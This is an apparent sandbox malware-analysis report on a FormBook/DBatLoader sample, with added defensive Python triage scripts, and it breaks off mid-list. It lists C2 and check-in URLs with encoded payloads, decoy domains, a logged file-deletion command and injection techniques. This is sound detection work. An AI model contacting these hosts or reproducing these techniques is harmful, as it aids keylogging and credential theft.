
Windows Analysis Report
Fpopgapwdcgvxn.exe

Overview

General Information

Sample Name: Fpopgapwdcgvxn.exe
Analysis ID: 1350545
MD5: 072d323c28e7ba4d63eb7df9894f33c9
SHA1: cf6a2b1ba98bf303e93b4070919ec1cd30262377
SHA256: d164c7ce3856705552a7dcd91f577c12162d5eb522153e33e91f86536cac5fb2
Tags: exe, Formbook, modiloader

Detection

Detection: DBatLoader, FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected DBatLoader
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign process
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Allocates many large memory chunks
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to record screenshots
Contains functionality to check if a connection to the internet is available
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Fpopgapwdcgvxn.exe (PID: 2268 cmdline: C:\Users\user\Desktop\Fpopgapwdcgvxn.exe MD5: 072D323C28E7BA4D63EB7DF9894F33C9)
    • colorcpl.exe (PID: 5112 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 6708 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 5196 cmdline: /c del "C:\Windows\SysWOW64\colorcpl.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Telragab.PIF (PID: 4780 cmdline: "C:\Users\Public\Libraries\Telragab.PIF" MD5: 072D323C28E7BA4D63EB7DF9894F33C9)
          • colorcpl.exe (PID: 6928 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
        • Telragab.PIF (PID: 368 cmdline: "C:\Users\Public\Libraries\Telragab.PIF" MD5: 072D323C28E7BA4D63EB7DF9894F33C9)
          • SndVol.exe (PID: 1016 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
          • WerFault.exe (PID: 5780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 2180 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • chkdsk.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
  • cleanup
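The tree above carries several of the behaviours the signature list names: colorcpl.exe started in suspended mode and hollowed, explorer.exe appearing as a child of that injected process, a rundll32.exe with no DLL argument under explorer.exe, a cmd.exe that deletes a file under C:\Windows\SysWOW64, and a copy of the sample (identical MD5) relaunched from C:\Users\Public\Libraries with a .PIF extension. The triage pass below is an added example, not Joe Sandbox code: the event records are constructed from the tree as shown (the cmd.exe image path is not given, so only its basename is used), and the rule names and the assumption that explorer.exe is normally started by userinit.exe or winlogon.exe are the author's.

```python
"""Triage heuristics over a sandbox process tree (added example)."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int      # 0 = launched by the sandbox itself
    image: str     # executable as recorded in the tree
    cmdline: str
    md5: str


SAMPLE_MD5 = "072D323C28E7BA4D63EB7DF9894F33C9"

# Constructed from this report's process tree (abbreviated to one branch).
EVENTS = [
    Proc(2268, 0, r"C:\Users\user\Desktop\Fpopgapwdcgvxn.exe",
         r"C:\Users\user\Desktop\Fpopgapwdcgvxn.exe", SAMPLE_MD5),
    Proc(5112, 2268, r"C:\Windows\System32\colorcpl.exe",
         r"C:\Windows\System32\colorcpl.exe", "DB71E132EBF1FEB6E93E8A2A0F0C903D"),
    Proc(4004, 5112, r"C:\Windows\Explorer.EXE",
         r"C:\Windows\Explorer.EXE", "662F4F92FDE3557E86D110526BB578D5"),
    Proc(6708, 4004, r"C:\Windows\SysWOW64\rundll32.exe",
         r"C:\Windows\SysWOW64\rundll32.exe", "889B99C52A60DD49227C5E485A016679"),
    Proc(5196, 6708, "cmd.exe",   # image path not shown in the tree; basename only
         r'/c del "C:\Windows\SysWOW64\colorcpl.exe"', "D0FCE3AFA6AA1D58CE9FA336CC2B675B"),
    Proc(4780, 4004, r"C:\Users\Public\Libraries\Telragab.PIF",
         r'"C:\Users\Public\Libraries\Telragab.PIF"', SAMPLE_MD5),
    Proc(6928, 4780, r"C:\Windows\System32\colorcpl.exe",
         r"C:\Windows\System32\colorcpl.exe", "DB71E132EBF1FEB6E93E8A2A0F0C903D"),
]

# Assumption: in an interactive session explorer.exe is created by the logon
# chain; any other parent means something else launched (or injected) it.
NORMAL_EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe"}
DECEPTIVE_EXEC_EXTS = {".pif", ".scr", ".com"}
DEL_IN_WINDOWS = re.compile(r'/c\s+del\s+"?(c:\\windows\\[^"]+)"?', re.IGNORECASE)


def basename(path: str) -> str:
    return ntpath.basename(path.strip('"')).lower()


def triage(events, sample_md5=SAMPLE_MD5):
    """Return (rule, pid, detail) for every event one of the heuristics fires on."""
    by_pid = {p.pid: p for p in events}
    root = next(p for p in events if p.ppid == 0)
    hits = []
    for p in events:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        parent_name = basename(parent.image) if parent else None

        # rundll32.exe whose command line is only its own path has nothing to
        # run; the process exists to host injected code.
        if name == "rundll32.exe" and p.cmdline.strip('"').lower() == p.image.lower():
            hits.append(("rundll32_without_dll_argument", p.pid, p.cmdline))

        # explorer.exe created by something other than the logon chain.
        if name == "explorer.exe" and parent_name not in NORMAL_EXPLORER_PARENTS:
            hits.append(("explorer_with_abnormal_parent", p.pid, f"parent={parent_name}"))

        # cmd /c del of a file inside C:\Windows.
        if name == "cmd.exe":
            m = DEL_IN_WINDOWS.search(p.cmdline)
            if m:
                hits.append(("cmd_del_in_windows_dir", p.pid, m.group(1)))

        # Same hash as the submitted sample, executed from another path with a
        # deceptive extension: the loader copied itself and relaunched.
        if (p.pid != root.pid and p.md5.upper() == sample_md5.upper()
                and p.image.lower() != root.image.lower()
                and ntpath.splitext(p.image)[1].lower() in DECEPTIVE_EXEC_EXTS):
            hits.append(("self_copy_with_deceptive_extension", p.pid, p.image))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in triage(EVENTS):
        print(f"{rule:38} pid={pid:<6} {detail}")
```

Each rule fires on exactly one process in this tree (6708, 4004, 5196 and 4780 respectively). The explorer.exe rule is the noisiest of the four on real telemetry, because Joe Sandbox draws explorer.exe under the process that injected into it while an EDR records the true parent; on endpoint data the equivalent check is "explorer.exe with a thread whose start address lies outside a loaded module", which this report's "Queues an APC in another process" and "Modifies the context of a thread in another process" signatures correspond to.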
Malware Configuration (FormBook): {"C2 list": ["www.hivaom.top/ao65/"], "decoy": ["spins2023.pro", "foodontario.com", "jsnmz.com", "canwealljustagree.com", "shopthedivine.store", "thelakahealth.com", "kuis-raja-borong.website", "hbqc2.com", "optimusvisionlb.com", "urdulatest.com", "akhayarplus.com", "info-antai-service.com", "kermisbedrijfkramer.online", "epansion.com", "gxqingmeng.top", "maltsky.net", "ictwath.com", "sharmafootcare.com", "mycheese.net", "portfoliotestkitchen.com", "gwhi13.cfd", "fuzzybraintrivia.com", "thnkotb.com", "merchdojacat.com", "1techtrendzstore.com", "cnkclaw.net", "xsslm888.com", "musecheng.net", "flowandfield.online", "somdevista.com", "baissm.top", "xn--88-uqi1dtk.com", "cewra.com", "stellarskyline.com", "mbutunerfitness.com", "ssongg13916.cfd", "sprockettrucking.com", "boonts.cfd", "oaistetic.com", "enfejbazi1sjrttrsjegfwafe.click", "you-can-too.com", "chamdiemcchc.com", "mrgdistilling.info", "yptv1.com", "ecofare.xyz", "ouxodb001.cfd", "sdymavillageculturehouse.com", "carbolife.net", "iokgw1.top", "harmonicod.com", "bbpinata.com", "grfngr.design", "colibriinvest.com", "infossphere.space", "glistenbeautylounge.com", "paysprinters.online", "ruhaniiyat.com", "leathfortexas.com", "tuesdayfolder.com", "autoinsurancebound.com", "scwanguan.fun", "darkcreamslivki.xyz", "0qtqg.com", "ycth3hhtkd.asia"]}
Yara matches (initial sample)

Source | Rule | Description | Author
Fpopgapwdcgvxn.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Yara matches (dropped file)

Source | Rule | Description | Author
C:\Users\Public\Libraries\Telragab.PIF | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Yara matches (memory dump 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp)

Rule | Description | Author
JoeSecurity_FormBook | Yara detected FormBook | Joe Security
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18809:$sqlite3step: 68 34 1C 7B E1
  • 0x1891c:$sqlite3step: 68 34 1C 7B E1
  • 0x18838:$sqlite3text: 68 38 2A 90 C5
  • 0x1895d:$sqlite3text: 68 38 2A 90 C5
  • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
(67 memory-dump entries in total; the remaining entries are not shown here)
Yara matches (unpacked PE 3.2.colorcpl.exe.68b0000.1.unpack)

Rule | Description | Author
JoeSecurity_FormBook | Yara detected FormBook | Joe Security
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a09:$sqlite3step: 68 34 1C 7B E1
  • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a38:$sqlite3text: 68 38 2A 90 C5
  • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
(29 unpacked-PE entries in total; the remaining entries are not shown here)
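The memory-dump table and the unpacked-PE table above report the same rule strings at different offsets. A quick check worth doing before treating the two artefacts as the same payload is that every hit is shifted by one constant (a varying shift would mean different code, or a different build, landed in the two dumps). The parser below is an added example, not part of the Joe Sandbox report; the hit lines are copied from the two tables, and the hit-line grammar it parses is inferred from those lines only.

```python
"""Parse Joe Sandbox-style Yara hit lines and compare two match sets (added example)."""
import re

# Hit lines copied from the two Yara tables above: the rundll32.exe memory
# dump (process 6 in the report's numbering) and the unpacked PE from
# process 3 (3.2.colorcpl.exe.68b0000.1.unpack). Subset, same order in both.
DUMP_HITS = """
0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x18809:$sqlite3step: 68 34 1C 7B E1
0x1884b:$sqlite3blob: 68 53 D8 7F 8C
"""
UNPACK_HITS = """
0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
0x17a09:$sqlite3step: 68 34 1C 7B E1
0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
"""

# <hex offset>:<$string id>: <hex bytes separated by spaces>
HIT = re.compile(r"^(0x[0-9a-fA-F]+):(\$\w+):\s*((?:[0-9A-Fa-f]{2}\s?)+)$")


def parse_hits(text):
    """Return [(offset, string_id, pattern_bytes), ...] in file order."""
    hits = []
    for line in text.strip().splitlines():
        m = HIT.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised hit line: {line!r}")
        hits.append((int(m.group(1), 16), m.group(2), bytes.fromhex(m.group(3))))
    return hits


def offset_delta(a, b):
    """If both lists hold the same strings with the same bytes, in the same
    order, and every pair differs by one constant offset, return that delta.
    Any mismatch returns None."""
    if len(a) != len(b):
        return None
    deltas = set()
    for (off_a, id_a, pat_a), (off_b, id_b, pat_b) in zip(a, b):
        if id_a != id_b or pat_a != pat_b:
            return None
        deltas.add(off_a - off_b)
    return deltas.pop() if len(deltas) == 1 else None


def push_immediates(hits):
    """For hits that are a single x86 'push imm32' (opcode 0x68 + 4 bytes),
    decode the little-endian constant being pushed. The JPCERT rule's
    $sqlite3* strings are of this form; the constants are the values to pivot
    on when hunting in other dumps."""
    out = {}
    for _, sid, pat in hits:
        if len(pat) == 5 and pat[0] == 0x68:
            out[sid] = int.from_bytes(pat[1:], "little")
    return out


if __name__ == "__main__":
    dump, unpack = parse_hits(DUMP_HITS), parse_hits(UNPACK_HITS)
    print("constant delta:", hex(offset_delta(dump, unpack)))
    for sid, imm in push_immediates(dump).items():
        print(f"{sid:14} push 0x{imm:08X}")
```

On the full tables every pair, not just the subset above, differs by 0xE00. The $a1 pattern also shows how these rules are written: 3C 30 is `cmp al, '0'` and 50 4F 53 54 is the ASCII text "POST", so the string matches the code that checks the HTTP verb rather than the literal "POST" string, which survives re-packing better.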
              No Sigma rule has matched
Snort IDS alerts (all seven are SID 2031412, ET TROJAN FormBook CnC Checkin (GET); classtype "A Network Trojan was detected"; protocol TCP)

Timestamp | Source | Destination | SID
11/30/23-14:57:23.481544 | 192.168.2.6:49747 | 3.33.130.190:80 | 2031412
11/30/23-14:58:03.063025 | 192.168.2.6:49748 | 34.93.103.39:80 | 2031412
11/30/23-14:58:24.506470 | 192.168.2.6:49749 | 104.140.89.24:80 | 2031412
11/30/23-14:58:44.521868 | 192.168.2.6:49750 | 3.33.130.190:80 | 2031412
11/30/23-14:59:05.034219 | 192.168.2.6:49751 | 104.247.81.50:80 | 2031412
11/30/23-14:59:25.599111 | 192.168.2.6:49752 | 37.97.254.27:80 | 2031412
11/30/23-14:59:45.996751 | 192.168.2.6:49753 | 62.72.50.88:80 | 2031412


              AV Detection

Source: http://www.harmonicod.com/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.canwealljustagree.com/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.ecofare.xyz/ao65/ | Avira URL Cloud: Label: phishing
Source: http://www.kermisbedrijfkramer.online/ao65/www.stellarskyline.com | Avira URL Cloud: Label: malware
Source: http://www.optimusvisionlb.com/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.kermisbedrijfkramer.online | Avira URL Cloud: Label: phishing
Source: http://www.sprockettrucking.com/ao65/www.leathfortexas.com | Avira URL Cloud: Label: malware
Source: http://www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP | Avira URL Cloud: Label: malware
Source: http://www.stellarskyline.com/ao65/?3f94p=VAHOj8ipz1NvM3cWmHPyRmFT7dV4XaBrhkZucwTvHTdt+uk8nfyPBl3lilEqIH7Lfnspwggtew==&ojq4i=mFNh5n78I22D3DgP | Avira URL Cloud: Label: malware
Source: http://www.1techtrendzstore.com/ao65/www.kuis-raja-borong.website | Avira URL Cloud: Label: malware
Source: http://www.hivaom.top/ao65/www.canwealljustagree.com | Avira URL Cloud: Label: phishing
Source: http://www.ouxodb001.cfd/ao65/www.optimusvisionlb.com | Avira URL Cloud: Label: malware
Source: http://www.1techtrendzstore.com/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.maltsky.net/ao65/?3f94p=U+zAKk5GFPF9sXmyHB7CBujsr49+ry/l09LFQEQGSX0L4+hNQ2paLAM2kd/yuXu6AcnnHpW1KQ==&ojq4i=mFNh5n78I22D3DgP | Avira URL Cloud: Label: malware
Source: http://www.optimusvisionlb.com/ao65/www.maltsky.net | Avira URL Cloud: Label: malware
Source: www.hivaom.top/ao65/ | Avira URL Cloud: Label: phishing
Source: http://www.optimusvisionlb.com/ao65/?3f94p=Olh8eEjR5IT46fH2PeVd1Lc15fw8Z1PVOirT2eqb4t/bi7TTuO6yJGtOPy5w7PRh9e2z8DbdcQ==&ojq4i=mFNh5n78I22D3DgP | Avira URL Cloud: Label: malware
Source: http://www.stellarskyline.com/ao65/www.hivaom.top | Avira URL Cloud: Label: malware
Source: http://www.leathfortexas.com/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.hivaom.top/ao65/?3f94p=B3GcozZs3ohtof+Eq3ZwUrCdoNWOjNCPbyllHAjlOtmwH5sozkgIB7xqH4//btWoobo3GMsY9g==&ojq4i=mFNh5n78I22D3DgP | Avira URL Cloud: Label: phishing
Source: http://www.kermisbedrijfkramer.online/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.kuis-raja-borong.website/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.hivaom.top/ao65/ | Avira URL Cloud: Label: phishing
Source: http://www.kuis-raja-borong.website/ao65/www.oaistetic.com | Avira URL Cloud: Label: malware
Source: http://www.harmonicod.com/ao65/?3f94p=SIOjWgUx9Sz9T19JihLVHEMNoaK2maww+N41rkYkWun2OwaoSexibxzMqiX45PItRVwWmDJ2nA==&ojq4i=mFNh5n78I22D3DgP | Avira URL Cloud: Label: malware
Source: http://www.sprockettrucking.com/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.canwealljustagree.com | Avira URL Cloud: Label: malware
Source: http://www.maltsky.net/ao65/www.thnkotb.com | Avira URL Cloud: Label: malware
Source: http://www.ecofare.xyz/ao65/www.iokgw1.top | Avira URL Cloud: Label: phishing
Source: http://www.oaistetic.com/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.leathfortexas.com/ao65/?3f94p=ys1nmsb6X1mQM1Jd478oiUQn9vuATHYUt4Dy8pL3kyVIlzOboPcsTdVyW5SVB7hST99gmWn6+w==&ojq4i=mFNh5n78I22D3DgP | Avira URL Cloud: Label: malware
Source: http://www.stellarskyline.com/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.canwealljustagree.com/ao65/www.ecofare.xyz | Avira URL Cloud: Label: malware
Source: http://www.leathfortexas.com/ao65/www.ouxodb001.cfd | Avira URL Cloud: Label: malware
Source: http://www.maltsky.net/ao65/ | Avira URL Cloud: Label: malware
Source: http://www.thnkotb.com/ao65/www.harmonicod.com | Avira URL Cloud: Label: malware
Source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (C2 www.hivaom.top/ao65/ plus 64 decoy domains; the full configuration is listed under the process tree above)
Source: Fpopgapwdcgvxn.exe | ReversingLabs: Detection: 70%
Source: Fpopgapwdcgvxn.exe | Virustotal: Detection: 69%
Source: Yara match | File source: 3.2.colorcpl.exe.68b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.colorcpl.exe.65f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.colorcpl.exe.68b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Fpopgapwdcgvxn.exe.14d50000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.colorcpl.exe.65f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4615095340.0000000000BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4608973113.0000000000710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2614531899.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2614107141.00000000046D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2333009592.0000000014D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2387834740.0000000005280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2332347871.0000000014B9A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2387807340.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2317053804.000000007EBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2614057783.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4614921342.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2388135598.00000000068B0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2617984530.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: leathfortexas.com | Virustotal: Detection: 10%
Source: www.maltsky.net | Virustotal: Detection: 6%
Source: kermisbedrijfkramer.online | Virustotal: Detection: 8%
Source: stellarskyline.com | Virustotal: Detection: 5%
Source: http://www.canwealljustagree.com/ao65/ | Virustotal: Detection: 10%
Source: http://www.leathfortexas.com/ao65/ | Virustotal: Detection: 5%
Source: C:\Users\Public\Libraries\Telragab.PIF | ReversingLabs: Detection: 70%
Source: Fpopgapwdcgvxn.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Telragab.PIF | Joe Sandbox ML: detected
Source: Fpopgapwdcgvxn.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: Binary string: chkdsk.pdbGCTL source: colorcpl.exe, 0000000C.00000003.2612449594.0000000002661000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2613913537.0000000004590000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2617872903.0000000000590000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: colorcpl.pdbGCTL source: explorer.exe, 00000005.00000002.4633580692.000000001097F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.0000000004DBF000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4612887516.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: colorcpl.pdb source: explorer.exe, 00000005.00000002.4633580692.000000001097F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4617256612.0000000004DBF000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.4612887516.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: Fpopgapwdcgvxn.exe, 00000000.00000002.2320819738.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000002.2347225090.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, Fpopgapwdcgvxn.exe, 00000000.00000003.2292292192.000000007EC00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: chkdsk.pdb source: colorcpl.exe, 0000000C.00000003.2612449594.0000000002661000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2613913537.0000000004590000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2617872903.0000000000590000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000003.00000003.2320149761.000000000530E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E79E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000003.2318073446.0000000005151000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2389849761.00000000046CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2387898399.0000000004512000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4616342750.0000000004870000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2580553834.000000000474F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E340000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.2578529137.0000000004596000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.2626388526.000000001E4DE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000003.2615483603.00000000055AC000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000D.00000002.2618280438.00000000058FE000.00000040.00001000.00020000.00000000.sdmp, 